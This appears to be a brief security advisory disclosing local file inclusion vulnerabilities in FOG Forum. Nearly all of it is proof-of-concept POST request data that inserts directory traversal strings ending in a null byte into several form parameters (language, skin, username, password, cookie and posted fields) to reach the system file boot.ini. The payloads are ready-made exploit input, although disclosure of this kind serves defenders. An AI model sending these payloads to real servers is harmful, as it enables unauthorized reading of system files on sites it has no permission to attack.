FOG Forum Multiple Local File Include Vulnerabilities

FOG Forum Multiple Local File Include Vulnerabilities

Attackers can exploit these issues using a browser.

The following proof-of-concept POST request data is available:

fog_skin=default&fog_lang=../../../../../../../../boot.ini%00 fog_skin=../../../../../../../../boot.ini%00&fog_lang=francais fog_pseudo=../../../../../../../../boot.ini%00&fog_password=cwhmail@cwh.com&fog_cook=0&fog_action=0&fog_userid=cwhmail@cwh.com&fog_path=http://localhost/forum/index.php fog_posted=../../../../../../../../boot.ini%00&fog_pseudo=cwhmail@cwh.com&fog_password=cwhmail@cwh.com&fog_cook=0 fog_posted=1&fog_pseudo=../../../../../../../../boot.ini%00&fog_password=cwhmail@cwh.com&fog_cook=0 fog_posted=1&fog_pseudo=cwhmail@cwh.com&fog_password=../../../../../../../../boot.ini%00&fog_cook=0 fog_posted=1&fog_pseudo=cwhmail@cwh.com&fog_password=cwhmail@cwh.com&fog_cook=../../../../../../../../boot.ini%00